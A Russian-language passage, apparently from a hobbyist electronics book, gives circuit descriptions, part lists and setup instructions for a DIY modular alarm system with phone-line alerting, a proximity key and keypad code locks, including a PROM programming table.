  1. Предусмотрено смешанное питание. В стационарных условиях основным является сеть 220 В, но в случае ее отключения питание переходит на аккумулятор напряжением 9...13 В. Номинальное напряжение питания 12 В. Ток, потребляемый блоком охраны от аккумулятора в режиме ОХРАНА не превышает 0,15 мА Схема постоянно контролирует состояние аккумулятора и вовремя оповестит о снижении напряжения ниже 9 В.
  2. Включение и выключение режима охраны производится разными кнопками При включении блока кнопкой SB1 устройство будет ждать, пока сработает датчик F1, после чего выполняется задержка 12 с до перехода в режим ОХРАНА За это время надо покинуть помещение и закрыть дверь Выключение
    блока охраны производится кнопкой SB2.
  3. Схема предусматривает подключение датчиков по четырем независимым охранным шлейфам, при этом количество датчиков не ограничено
  4. При срабатывании датчика, установленного на входной двери (F1) в режиме ОХРАНА, блок временных интервалов обеспечивает задержку 6...7 с на включение сигнальных устройств. За этот интервал времени необходимо успеть отключить блок охраны скрытно установленной кнопкой SB2 При срабатывании других датчиков звуковой сигнал тревоги включается без задержки.
  5. Предусмотрено ограничение времени работы звукового сигнала. При самых неблагоприятных обстоятельствах (когда датчики постоянно срабатывают) суммарное время работы сирены не превысит 16 мин. Режим ограничения можно отключить тумблером SA1.
  6. Для удобства эксплуатации блок охраны имеет звуковую и световую индикацию режимов работы схемы
  • при включении кнопкой SB1, если все охранные датчики находятся в исходном состоянии, никакой индикации быть не должно непрерывное свечение зеленого светодиода говорит о пониженном напряжении на аккумуляторе, а красного — что сработал один из охранных датчиков (F2 F4),
  • при кратковременном срабатывании датчика F1, пока идет отсчет интервала 12 с, мигает зеленый светодиод,
  • когда блок перешел в режим ОХРАНА, никакой индикации нет,
  • при срабатывании F1 и начале отсчета второго интервала (6 с) раздается тихий прерывистый звуковой сигнал и мигает зеленый светодиод.

В зависимости от назначения системы схема блока питания (А1) выбирается из вариантов, показанных на рис 2.3

В качестве охранных датчиков могут применяться герконовые контакты совместно : магнитом или кнопки (первое надежнее, так как они герметичны и не боятся атмосферных воздействий).

Для звукового сигнала тревоги (НА1) может использоваться автомобильная сирена или аналогичная пищалка. Ее включение производится одной из групп контактов реле ЗК1 (A3), что позволяет коммутировать любую нагрузку, в том числе сетевого звонка (до трех разных устройств одновременно). Если же блок охраны имеет только автономное питание, то вместо реле ЗК1 можно подключить сразу звуковую сирену.

Рассмотрим более подробно работу модулей системы охраны

Источник питания А1 в особых пояснениях не нуждается, так как собран по типовой схеме Коммутация напряжения питания осуществляется контактами поляризованного реле К1 (А1), рис 23, которое выполняет роль триггера. Особенностью такого реле является способность поддерживать переключающие контакты в нужном положении при отсутствии напряжения на обмотке — достаточно кратковременной подачи напряжения на соответствующую обмотку, чтобы переключить группу контактов. В качестве резервного источника питания G1 могут применяться 10 аккумуляторов типа НКГЦ-0,5 или более мощные. Если G1 не устанавливается, то цепь контроля напряжения соединяется с "+" питания (на рис. 2.За перемычка вместо диода VD5)

2-3.jpg

Рис. 2.3. а) Питание схемы в стационарных условиях,
б) питание схемы в автомобиле

2-4.jpg

Рис. 2.4. Электрическая схема блоков системы охраны

Для питания всех узлов схемы можно использовать и меньшее напряжение, если применять все исполнительные реле с обмоткой на соответствующее рабочее напряжение.

Блок временных интервалов A3, рис. 2.4, состоит из триггера на элементах D1.1. D1.3; генератора импульсов D3 1, D3.2; счетчика импульсов D5 селектора временных интервалов (12 и 6 с) на логических элементах микросхем D6, D3 4, D7; ограничителя времени звучания звукового сигнала на счетчике D2; триггера на элементах D4 для обеспечения режима ожидания начала отсчета первого временного интервала (12 с).

В момент подачи питания на схему импульс, сформированный цепью C3-R3, обеспечивает начальную нулевую установку счетчиков D2 и D5 (на выходе D2/7 появится лог. "1", т. е. напряжение питания). При этом на выводах микросхем будут состояния: D4/3 — "1"; D5/11 — "1"; D1/1 — "1"; D1/2 — "1" D1/3 — "0"; D6/10 — "1"; D7/9 — "0".

После срабатывания датчика F1 (лог. "0" на входах D4/13 и D1/9) на выходе D4/11 появится лог. "1" (на D4/10 — лог. "0", что разрешает работу счетчика D5). При этом работает генератор (импульсы на D3/3 с частотой примерно 500 Гц) и связанный с ним счетчик D5, до момента времени (12 с), пока на D6/10 не появится лог. "0" (на D1/3 лог. "1" — что остановит работу генератора). Схема переходит в режим ОХРАНА. Если при этом сработает датчик F1 — переключится триггер на элементах D1 1 .D1.3 (на выводе D1/4 появится лог. "1", на D1/3 — "0"), что разрешает работу генератора и счетчика D5. В этом случае если не нажать кнопку SB2, через 6 с появится звуковой сигнал тревоги.

При срабатывании любого другого датчика триггер на элементах D1.1...D1.3 также переключится, но звуковой сигнал тревоги появится без задержки и будет прерывистым, так как лог. "О" подается на вход D3/12, а на D3/11 будут импульсы.

Счетчик D2 позволяет ограничить время работы звукового оповещения. Когда на D2/7 появится лог. "О" (при включенном SA1), а на D4/10 - лог. "1" — этот уровень дает запрет на работу D5 и прохождение сигналов на выход D7/9.

Контроль за напряжением аккумулятора выполняет транзистор VT3. Он работает в режиме микротоков, за счет чего имеет большое усиление и переключается из запертого состояния в открытое при изменении напряжения в цепи контроля на 0,1 В. Подбором резистора R11 нужно добиться, чтобы при
напряжении источника G1 9 В и меньше транзистор VT3 запирался (лог "1" на входе D4/6). Зеленый светодиод будет непрерывно светиться — что говорит о необходимости устранить причину снижения напряжения. Светодиод отключится при переходе схемы в режим ОХРАНА (D4/5 — лог "0") — это исключает разряд элементов питания за счет тока, протекающего через светодиод. Сдвоенный
светодиод HL1 можно заменить двумя любыми обычными, но с разным цветом свечения. Зеленый светодиод служит также для индикации режимов работы моргает). Пои этом для того чтобы снизить ток потребления схемой, напряжение на него подается короткими импульсами с выхода D7/10. Из-за инерции зрения это незаметно.

Топология печатной платы для схемы не разрабатывалась, и монтаж радиоэлементов несложно выполнить на универсальных макетных платах с контактными площадками под установку микросхем При монтаже следует учитывать, что, пока микросхемы не распаяны в схему, они боятся статического электричества.

В схеме применены неполярные конденсаторы — К10-17, электролитические типа К52-1Б или аналогичные с малыми токами утечки Резисторы подойдут любые. Диодную матрицу КДС627А можно заменить обычными импульсными диодами. Вместо сдвоенного светодиода HL1 подойдут два одинарных из серии КИПД24 (разных цветов) Микросхемы серии 561 заменяются на аналогичные из серии 564 Для соединения модулей между собой (при использовании системы для охраны помещения) удобно применять разъемы типа МРН14-1 или аналогичные. Реле ЗК1 типа РЭС48, паспорт РС4.520.202
(РС4.520 214), но подойдут и многие другие Поляризованные реле К1 блока питания типа РЭС32Б РС4 520.204, РС4 520.212 или РС4.520 220.

Соединения от датчиков F1.. F4 до схемы выполняются перевитыми между собой проводами. Кнопка SB2 устанавливается скрытно в любом удобном месте. Звуковой индикатор HF1 и светодиод HL1 желательно вынести из корпуса, что отвлечет внимание от места расположения основной конструкции в случае проникновения вора.

Налаживание блока временных интервалов начинается с установки резистором R12 порога запирания транзистора VT3 при напряжении 9 В в цепи аккумулятора (напряжение подается от регулируемого источника питания). После этого проверяется логика работы схемы в соответствии с описанием. При необходимости можно подстроить частоту тактового генератора резистором R9 для получения временных интервалов 6 и 12 с (или 8 и 16с).

 

Рис. 2.2. Базовый блок охранной сигнализации

Изображение: 

Рис. 2.3. а) Питание схемы в стационарных условиях, б) питание схемы в автомобиле

Изображение: 

Рис. 2.4. Электрическая схема блоков системы охраны

Изображение: 

2. Сканер датчиков

Сканер датчиков

Применение сканера (А2) обеспечивает автоматическое запоминание состояния датчиков в момент включения блока охраны как исходного. При этом датчики F2, F4 могут быть в произвольной комбинации замкнуты или разомкнуты — сигнализация сработает от изменения состояния, а при долговременном нарушении одного из четырех шлейфов охраны, через 3,5 мин работы сирены, сканер переключит цепь охраны на инверсный сигнал, т. е. если раньше данный шлейф срабатывал на размыкание, то теперь будет реагировать на изменение состояния (замыкание). Такое переключение при необходимости схема выполняет до трех раз, когда появляется импульс на выходе D2/14 счетчика.

Сканер охранных датчиков А2, рис. 2 4, собран на двух микросхемах. Четырехразрядный последовательно-параллельный регистр 2D1 используется для запоминания исходного состояния охранных датчиков. Запись в регистр производится при появлении импульса на входе 2D1/6 — первоначально это происходит при срабатывании датчика F1 (триггер на D4.2, D4.3 переключится). Управление регистром 2D1 выбрано так, что на его выходах сигнал является инверсным по отношению к входным (в начальном состоянии на выводах 13,15, 14 и 1 будет лог "1") Логические элементы 2D2 обеспечивают на выходах лог "1", что эквивалентно подключению к разъему ХЗ нормально разомкнутых датчиков как это показано на рис. 2.2.

В качестве датчиков, устанавливаемых на дверях, окнах и других местах могут применяться как обычные, промышленного изготовления (СМК-1, ДИМК) на размыкание, так и любые другие (ультразвуковые, емкостные, инфракрасные и т. д.), имеющие релейный выход при срабатывании. К одному охранному шлейфу может подключаться много датчиков, замкнутых в кольцо так, чтобы при размыкании любого из них разрывалась цепь.

 

3. Подключение удаленного датчика

Подключение удаленного датчика

Если же необходимо подключить удаленный датчик и провода невозможно скрыть, то шлейф охраны должен срабатывать при любом нарушении цепи (разрыве или замыкании).

2-5.jpg

Рис. 2. 5. Электрическая схема для подключения удаленного датчика

Традиционное построение такой схемы связано с включением датчика последовательно с резистором в плечо моста. При разбалансе моста формируется сигнал срабатывания В этом случае по цепи хранного шлейфа должен протекать ток более 5 мА, что не экономично, так как требуется мощный источник автономного питания Аналогичную задачу, но работая в импульсном режиме, выполняет схема на рис. 2.5 — она потребляет не более 1,5 мА.

2-6.jpg

Рис. 2. 6. Топология печатной платы и расположение на ней элементов

Короткие импульсы вырабатывает автогенератор на транзисторе VT3. Балансируется мост, образованный из элементов R1-C1-C2-R2-R5-R6 подстроечным резистором R2 под конкретную линию охранного шлейфа при первоначальном подключении.

Топология печатной платы для схемы удаленного датчика приведена на рис. 2.6.

 

Рис. 2.5. Электрическая схема для подключения удаленного датчика

Изображение: 

Рис. 2.6. Топология печатной платы и расположение на ней элементов

Изображение: 

4. Кодовый кнопочный выключатель

Кодовый кнопочный выключатель

Выключение режима охраны (вместо кнопки SB2) можно выполнять набором кодового цифрового номера на кнопочной панели. Это затруднит отключение охраны. Код состоит из 4 цифр (из 10 возможных) Кнопки с определенными. Цифрами необходимо нажать в заданной последовательности. Это позволяет иметь не менее 5040 возможных вариантов кода.

Код можно легко и оперативно сменить, переставив зажимы проводов от кнопок в любой последовательности. Схема кодового устройства, рис. 2.7, собрана на одной микросхеме, содержащей четыре RS-триггера. Работает элекрическая схема следующим образом в начальный момент, при подаче питания, цепь из конденсатора С1 и резистора R6 формирует на входах R импульс обнуления триггеров.

При нажатии на кнопку с первой цифрой кода (на схеме SB7) триггер переключится, т е. на выходе D1/2 появится лог "1". Если при нажатии очередной кнопки на выходе соответствующего триггера имеется лог. "1", т е предыдущий сработал, то лог. "1" появится и на его выходе.

2-7.jpg

Рис 2 7 Кодовый кнопочный выключатель

Последний сработавший триггер открывает транзистор VT3, что подает напряжение для переключения поляризованного реле в блоке А1. Чтобы схема осталась в таком состоянии надолго, используется транзистор VT2. Он обеспечивает через задержку обнуления всех триггеров. Задержка выполнена засчет цепи заряда конденсатора СЗ через резистор R10. По этой причине на выходе D1/1 сигнал лог "1" будет присутствовать не более 1 с. Этого времени вполне - достаточно для срабатывания реле. Кроме того, использование для транзистора VT2 сигнала с выхода D1/10 позволяет ограничить необходимое время для нажатия последней кнопки кода.

Индикатором правильного набора номера является кратковременное свечение светодиода HL1. В процессе набора кода нажатие любой ошибочной цифры обнуляет все триггеры, и набор придется повторить сначала.

Так как для микросхемы режим, когда на R и S входах одновременно присутствует лог "1", является запрещенным, транзистор VT1 исключает такую возможность даже при нажатии сразу двух кнопок

Для уменьшения влияния помех и наводок схема размещается вблизи кнопочной панели.

Все используемые детали, за исключением транзистора VT3, могут быть любого типа. Транзистор VT3 применен с большим коэффициентом усиления и заменяется на КТ829А. Резисторы могут иметь отклонение номинала на 20% от указанных на схеме. Конденсатор С1 типа КМ-6, С2, СЗ — К52-1Б.

 

Рис 2 7 Кодовый кнопочный выключатель

Изображение: 

5. Оповещение по телефонной линии

Оповещение по телефонной линии

Блок А4 позволяет оповестить о срабатывании сигнализации одного из абонентов телефонной линии При этом квартира включается на прослушивание, если взяли трубку на другом конце. Электрическая схема, рис. 2.8, предназначена для работы совместно с базовым блоком охраны (соединяется через разъем Х5) и подключается к телефонной линии (ТЛ) параллельно с телефонным аппаратом в любом месте.

Устройство собрано на четырех микросхемах и обеспечивает автоматический набор номера нужного абонента в случае появления сигнала тревоги (лог. "1" на входе D1/3) При этом все основные управляющие сигналы снимаются с блока временных интервалов A3, что упростило схему.

Для узла набора номера применяется широко распространенная специализированная микросхема КР1008ВЖ1 (D4) и кнопочная панель "КК" от телефона-трубки. Работа этой микросхемы подробно описана в литературе [Л9]. Установка нужного номера осуществляется (при нахождении тумблера SA1 в положении ВКЛ) аналогично, как и в любом кнопочном ТА. Последний набранный номер хранится в регистрах памяти микросхемы (при наличии питания на выводе D4/3 — использование резервного автономного источника в этом случае является необходимым).

Для проверки правильности набора номера достаточно снять трубку с телефона и убедиться в соединении с нужным абонентом. Если номер телефона набран ранее и хранится в памяти этой микросхемы, то можно проверить правильность его набора последовательным нажатием на клавиши "#" (сброс) и "*" (повтор). При автоматическом дозвоне эту же комбинацию соединений выполняют электронные ключи на элементах D2 1 и D2.3 (вместо нажатия "#" достаточно прервать питание на выводе D4/6) Ключами управляют триггер D1 1 и счетчик D3, срабатывая от тактовых импульсов, приходящих на вход D3/14. Как только счетчик D3 досчитает до появления на его выходе D3/10 лог. "1", на D1/12 также появится лог. "1", что остановит работу D3.

Импульсы кодового набора номера, приходящие с выхода микросхемы D4/12 через замкнутый ключ D2.2, поступают на управление транзистором VT1.

2-8.jpg

Рис. 2.8. Блок оповещения по телефонной линии

Коммутацию ТЛ при наборе номера выполняют контакты герконового реле 4К1 1, что обеспечивает полную электрическую развязку цепей охраны от ТЛ.

Схема микрофонного усилителя, рис 2 9, на транзисторах VT2 VT4 питается от телефонной линии и будет подключена (контактами реле 4К1) до момента времени, пока на входах D1/4 и D3/15 не появится лог "1".

2-9.jpg

Рис. 2. 9. Схема микрофонного уснлителя

2-10.jpg

Рис. 2. 10. Схема замены реле 4К1 на оптоэчектронный ключ

Индикатором подключения ТЛ к блоку охраны (в режиме оповещения) является свечение светодиода HL1.

Ограничить время работы ТЛ с блоком охраны до 5 мин позволяет цепь из R7-C2. Как только в процессе заряда на конденсаторе С2 напряжение достиг нет порога срабатывания (открывания) ключа D2 4, лог. "1" будет подана на входы начальной установки (R) триггера и счетчика. Схема вернется в исходное
состояние, когда на D1/1 будет лог. "0".

Резисторы R1 R3 предохраняют входы микросхемы от повреждения статическим электричеством на время, пока блок не подключен к системе.

Схема, так же как и базовый блок, не критична к выбору используемых элементов и точности номиналов. Подстроечный резистор R11 типа СПЗ-19а, переключатель SA1 типа ПД9-2.

При правильной сборке настройка заключается в установке с кнопочной панели "КК" необходимого номера оповещения (при включенном SA1) и подборе оптимальной частоты набора номера резистором R11 (потребуется несколько раз убедиться в правильности набора номера).

Схема в дежурном режиме по цепи 12 В потребляет ток не более 31 мкА, а при наборе номера и оповещении по телефону не более 40 мА.

Ток потребления схемой в режиме оповещения можно значительно снизить (до 3 6 мА), если вместо герконового реле 4К1 типа РЭС55А паспорт РС4 569.602 использовать оптоэлектронный ключ, рис. 2.10. Коммутатор КР293КП1В заменяется аналогичным КР293КП4В, но при этом изменится нуме-
рация выводов.

 

Рис. 2.10. Схема замены реле 4К1 на оптоэчектронный ключ

Изображение: 

Рис. 2.8. Блок оповещения по телефонной линии

Изображение: 

Рис. 2.9. Схема микрофонного уснлителя

Изображение: 

Рис. 2.1. Структурная схема модульной системы охраны

Изображение: 

2. Бесконтактный ключ

Бесконтактный ключ

В отличие от обычного механического ключа или электронного (магнитной карточки), этот не потребуется доставать и вставлять в замок. При приближении к двери на 0,5 м человека, имеющего с собой данное устройство, — дверной замок с электроприводом (электромагнитом) автоматически откроется.
Сам ключ имеет габариты чуть больше спичечной коробки (70х54х17 мм) и легко размещается в любом кармане.

2-11.jpg

Рис. 2.11 Схема передатчика

В простейшем варианте система состоит из миниатюрного передатчика (ключа) и настроенного на его частоту приемника, а также исполнительного устройства с источником питания.

Устройство может найти и другие применения, например выключение охраны. Не зная места расположения приемника, таким ключом невозможно воспользоваться.

Схема передатчика, рис 211, собрана на одном транзисторе, работающем в режиме микротоков. Индуктивность L1 и конденсаторы С2, СЗ обеспечивают работу автогенератора на частоте около 200 кГц. Для питания взяты четыре аккумуляторных таблетки типа Д-0,115. Потребляемый передатчиком ток не превышает 1,6 мА, и одной зарядки аккумуляторов хватает для непрерывной работы схемы в течение трех суток

2-12.jpg

Pис. 2.12. Зарядное устройство

2-13.jpg

Рис. 2.13. Приемник

В качестве зарядного устройства может использоваться простейшая схема с бестрансформаторным питанием от сети 220 В, рис 212В этом случае не потребуется вскрывать корпус ключа — соединение с зарядным устройством выполняется через миниатюрный разъем Х1. Светодиод HL1 устанавливается
на корпусе зарядного устройства и служит индикатором наличия напряжения, а стабилитрон VD2 ограничивает напряжение на выходе. Для полного заряда аккумуляторов может потребоваться 4...10 часов.

Схема приемника показана на рис. 2. 13. Наведенный в катушке L1 сигнал усиливают транзисторы VT1 VT3. Детектирование сигнала выполняет транзистор VT4 (активный детектор) На VT5 и VT6 (в диодном включении) обеспечивается стабилизация рабочей точки каскадов усиления. Два резонансных контура (L1-C1-C2 и L2-C8) настраиваются на частоту передатчика с помощью ферритовых сердечников. Этим обеспечивается узкополосное усиление приемника и срабатывание (появление нулевого напряжения на коллекторе транзистора VT7) только от передатчика с определенной частотой.

Вариант схемы источника питания и исполнительного устройства с включением электромагнита YA1 показан на рис. 2.14. Конденсатор С1 обеспечивает задержку срабатывания транзистора VT2 при наличии случайных помех на выходе приемника.

2-14.jpg

Рис. 2.14. Исполнительное устройство

2-15.jpg

Рис. 2. 15. Топология печатной платы передатчика

Особенности конструкции. Постоянные резисторы могут быть любого типа, электролитические полярные конденсаторы применены типа К50-16, остальные конденсаторы — типа К10-17 (КМ-4).

2-16.jpg

Рис. 2.16. Топотогия печатной платы и расположение элементов приемника

Монтаж схем устройств выполнен на стеклотекстолите толщиной 1,5 мм. Топология печатной платы для передатчика и приемника приведены на рис. 2.15 и 2.16.

В передатчике монтаж радиоэлементов расположен со стороны печатных проводников. Элементы питания прижимаются к плате пластиной фольгированного стеклотекстолита (она не показана). Микропереключатель S1 типа ПД9-2 можно заменить кнопкой, которую придется нажимать при приближении к приемнику

Для изготовления катушек L1 (приемника и передатчика) взят ферритовый стержень марки 400НН (или 600НН) диаметром 8 мм от любой магнитной антенны бытового приемника (для настройки обычно достаточно кусочка длиной 20...30 мм). Катушки наматываются проводом ПЭЛШО диаметром 0,06 (0,08) мм и содержат 300 витков — у приемника, и 200 витков — у передатчика (на бумажном каркасе длиной 45 мм). После намотки витки фиксируются клеем типа "Момент". Для изготовления в приемнике катушки L2 взят каркас и ферритовые чашки от контуров промежуточной частоты миниатюрных радиоприемников, рис. 2.17. Обмотка содержит 1 — 160 витков, 2 — 200 витков проводом ПЭВ-2
диаметром 0,08 мм. Обмотки желательно выполнять в отсеках раздельно, при этом в верхней секции наматывается обмотка 1.

2-17.jpg

Рис. 2.17. Конструкция катушки L2 приемника

При установке приемника лучше располагать его на уровне положения ключа, кроме того, для получения максимальной дальности обнаружения, имеет значение расположение катушки передатчика и приемника — у них должны совпадать диаграммы направленности, что происходит в случае аналогичного расположения: горизонтально или перпендикулярно относительно земли.

В заключение можно отметить, что для повышения секретности ключа несложно ввести модуляцию частоты автогенератора кодовой посылкой или более низкой частотой (импульсная модуляция), что незначительно усложнит схему, но затруднит подделку ключа для человека, знакомого с принципом работы даной системы. Модуляция передатчика также увеличит время непрерывной работы передатчика без подзаряда аккумуляторов. В качестве модулятора удобно применить схему генератора, показанную на рис. 1.40. В приемнике в этом случае после детектора устанавливается простейший фильтр, настроенный на частоту модуляции.

 

Pис. 2.12. Зарядное устройство

Изображение: 

Рис. 2.11 Схема передатчика

Изображение: 

Рис. 2.13. Приемник

Изображение: 

Рис. 2.14. Исполнительное устройство

Изображение: 

Рис. 2.15. Топология печатной платы передатчика

Изображение: 

Рис. 2.16. Топотогия печатной платы и расположение элементов приемника

Изображение: 

Рис. 2.17. Конструкция катушки L2 приемника

Изображение: 

3. Многофункциональный кодовый замок

Многофункциональный кодовый замок

Иногда, для ограничения доступа посторонних, бывает удобно иметь кнопочный кодовый замок. Кодовый замок с числовым кодом, состоящим из 5 знаков (из 11 возможных), легко выполнить всего на одной программируемой микросхеме из серии РФ. Особенностью данной схемы (рис. 2.18) является использование цепей обратной связи (диоды VD2...VD5) с выхода микросхемы на ее вход, что позволяет при соответствующем программировании ПЗУ получить триггерный эффект (запоминание комбинации при правильном наборе номера).

В исходном состоянии на выходах 1...4 присутствует лог. "1", а на остальных выходах лог. "0". Микросхема программируется в соответствии с таблицей 2.1 (не показанные адреса программируются аналогично первой строчке таблицы).

2-18.jpg

Pис. 2.18. Электрическая схема

Связь двоичного кода с принятой 16 значнои системой обозначении приведена в таблице 2.2.

Программа работы микросхемы (см строку с адресом 7FO в таблице 2.1) составлена так что при последовательном нажатии кнопок подключенных к входам 1...4 (выводы 8...5), — на соответствующих выходах (выводы 9, 11,13) появляется лог. "0", что через диоды VD2...VD5 передается на вход. Это фиксирует нулевое состояние соответствующего входного сигнала уже после отпускания кнопки.

Для того чтобы получить управляющий сигнал на включение электромагнита необходимо нажать кнопки пятизначного кода в заданной последовательности — иначе потребуется повторять набор сначала. Нажатие любой ошибочной цифры переводит все выходы микросхемы в исходное состояние.

Таблица 2.1.

0

1

2

3

4

5

6

7

8

9

A

В

С

D

E

F

000

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

3FO

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

8F

400

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

5FO

OF

41

OF

OF

OF

OF

OF

OF

48

OF

OF

OF

OF

OF

OF

OF

600

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

6FO

OF

41

OF

OF

OF

OF

OF

OF

48

OF

OF

OF

OF

OF

OF

OF

700

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

710

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

720

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

730

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

740

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

750

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

760

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

770

10

41

OF

OF

OF

OF

OF

OF

48

OF

OF

OF

OF

OF

OF

OF

780

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

790

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

7АО

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

7ВО

20

41

OF

OF

OF

OF

OF

OF

48

OF

OF

OF

OF

OF

OF

OF

7СО

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

OF

7DO

OF

41

OF

OF

OF

OF

OF

OF

48

OF

OF

OF

OF

OF

OF

OF

7ЕО

OF

41

OF

OF

OF

OF

OF

OF

48

OF

OF

OF

OF

OF

OF

OF

7FO

00

01

OF

OF

OF

05

OF

07

08

OF

OF

OF

ОС

OF

OE

OF


 

Таблица 2.2.

0000

0

0001

1

0010

2

0011

3

0100

4

0101

5

0110

6

0111

7

1000

8

1001

9

1010

А

1011

В

1100

С

1101

D

1110

E

1111

F


 

Индикатором правильного набора кода служит свечение светодиода HL1. Включение электромагнита выполняет транзистор VT2. Нажатие на кнопку включает звонок а также сбрасывает ранее набранный код (переводит микросхему D1 в исходное состояние).

Использование программируемой микросхемы позволяет легко получить несколько дополнительных полезных функции Так, например, при попытке подобрать код— на выводе D1/16 появится сигнал тревоги (лог 1), что приведет к срабатыванию реле К1. Контакты К1 1 включаются в цепь шлейфа охранной сигнализации. Попыткой подбора кода считатся если первые три цифры набраны правильно, а в четвертой — ошибка.

2-19.jpg

Pис. 2.19 Эмутятор ПЗУ

Переключатель SA1 дает возможность быстро сменить код, не переставляя последовательность подключения кнопок ко входам микросхемы. Последовательность набора номера для положения переключателя SA1 "КОД 1" 1-2-3-4-8, а при положении "КОД 2" 4-2-3-1-7. При этом ко входам микросхемы могут подключаться кнопки с любыми номерами — важна только последовательность их нажатия относительно выводов микросхемы.

Приведенная схема несмотря на свою простоту, имеет большие возможности для модификации под конкретную задачу. Так например, набираемый код может состоять из двухзначных цифр — при этом потребуется, не меняя схемы, откорректировать таблицу программирования. По этой причине микросхему лучше устанавливать на контактной панельке.

Топология печатной платы не разрабатывалась а монтаж несложно выполнить на универсальной макетной плате. Для исключения наводок по соединительным с кнопками проводам устройство размещается вблизи кнопочной панели (30 50 см). При наличии наводок или при работе схемы в условиях большого уровня помех на входах микросхемы D1 можно установить конденсаторы
0,1 мкФ соединенные с общим проводом.

Схема не критична к типам используемых резисторов и конденсаторов. Резисторы R5 R16 могут иметь номинал 1... 8,2 кОм. Конденсаторы С1...С2 типа К50-35 на 25 В. Микросхема D1 заменяется на 573РФ2 или импортный аналог 2716. Программируемую микросхему можно использовать и других типов например КР556РТ6, КР556РТ7, но в этом случае может потребоваться внести изменение в схему соединении. Для удобства подключения кнопочной панели применен разъем Х1 типа МРН-14-1.

Устройство потребляет в дежурном режиме ток не более 45 мА что при стационарном питании несущественно. Если же требуется автономное питание то можно применить микросхему 537РУ10 или 537РУ8 (рис. 2.19). Она используется как эмулятор ПЗУ для чего программируется по приведенной таблице с выбранным напряжением программирования 5 В. А чтобы результаты переноса программы не были потеряны при отключении питания микросхема переносится в контактную колодку схемы замка с элементом резервного питания (батарея или аккумулятор).

Контрольная сумма запрограммированной микросхемы — 7ADAH (использован программатор КРОТ/РФ).

 

Pис. 2.18. Электрическая схема многофункционального кодового замка

Изображение: 

Pис. 2.19 Эмулятор ПЗУ

Изображение: 

4. Кодовый замок на тиристорах

Кодовый замок на тиристорах

При установке кодового замка не всегда имеется возможность располагать кнопочную панель вблизи от схемы управления. В этом случае применение тиристоров в качестве триггеров запоминающих правильную комбинацию на бранного кода обеспечивает более высокую помехоустойчивость и стойкость к умышленному повреждению по сравнению со схемами собранными только на КМОП микросхемах.

Приведенная на рис 2 20 схема позволяет ограничить доступ в помещение посторонних. Для срабатывания открывающего защелку электромагнита YA1 необходимо в определенной последовательности набрать код из 4 цифр (из 10 возможных).

Работает схема следующим образом. В исходном состоянии на вход управления D1 1/6 через резистор R12 поступает лог 1 и внутренний ключ микросхемы будет замкнут. Нажатие кнопок в последовательности S4 S3 S2 S1 приведет к поочередному открыванию соответствующих тиристоров VS4, VS3, VS2, VS1. Ток через резисторы R8 R10 позволяют удерживать сработавшие тиристоры во включенном состоянии. Причем если при наборе номера ошибочно нажата любая другая кнопка это приведет к срабатыванию ключа на элементе микросхемы D1. 3 что обеспечит появление лог 0 на входе D1. 1/6 — ключ разомкнется и частично правильно набранный код будет сброшен .

При правильном наборе номера появится ток протекающий через резисторы R6 R7 и откроется транзистор VT1. При этом будет подаваться питание на электромагнит YA1. А чтобы электромагнит не находился под напряжением в те чение длительного времени после срабатывания элемент D1. 2 совместно с цепью заряда конденсатора R11 С1 позволяет ограничить продолжительность его работы интервалом 24с. Время определяется номиналом конденсатора С1. Как только напряжение на входе D1 2/12 в процессе заряда конденсатора

2-20.jpg

Pис. 2.20. Элeктpнчecкaя схема кодового замка

2-21.jpg

Рис. 2.21. Схема замены транзистора VT1

2-22.jpg

Рис. 2. 22. Топология печатной платы и расположение элементов

достигнет порога срабатывания ключа, он подаст лог '0" на управление D1.1 что переведет все тиристоры в исходное состояние.

Устройство может работать при изменении питающего напряжения в более широких пределах чем это указано на схеме но его величина выбирается исходя из необходимой для надежного срабатывания применяемого электромагнита. При настройке схемы может потребоваться подбор номиналов резистора R7 и конденсатора С1.

Транзистор VT1 имеет большой коэффициент усиления и может быть заменен двумя обычными включенными по схеме, показанной на рис. 2. 21. Тиристоры могут использоваться с любой последней буквой в обозначении. Конденсаторы применены К50 35 на рабочее напряжение 40 В, а резисторы по дойдут любые.

Кнопка SB1 используется для дистанционного открывания замка внутри помещения и должна быть рассчитана на ток 3 А .

2-23.jpg

Рис. 2. 23. Подключение сменного кодозадающего штекера Х2

Все элементы схемы кроме трансформатора, диодов VD5 VD8 и электромагнита YA1, расположены на односторонней печатной плате, рис. 2. 22.

Для удобства смены кода и подключения цепей от кнопок набора номера на плате установлены винты М2,5 (как это показано на рисунке), к которым и закрепляют нужный провод. Если же установить дополнительный 16-ти контактный разъем (Х2, рис. 2. 23) со сменным кодозадающим штекером, то смена кода займет несколько секунд (если заранее подготовить штекера с установленными перемычками под нужные комбинации цифр кода) .

2-24.jpg

Pис. 2. 24. Схема ограничения времени

Один из элементов микросхемы не использован и с его помощью можно выполнить ограничение необходимого времени на набор кода, что дополнительно затруднит подбор кода. Пример варианта такого подключения D1.4 показан на рис. 2.24.

 

Pис. 2.20. Элeктpнчecкaя схема кодового замка

Изображение: 

Pис. 2.24. Схема ограничения времени

Изображение: 

Рис. 2.21. Схема замены транзистора VT1

Изображение: 

Рис. 2.22. Топология печатной платы и расположение элементов

Изображение: 

Рис. 2.23. Подключение сменного кодозадающего штекера Х2

Изображение: 

5. Электрошоковое средство защиты

Электрошоковое средство защиты
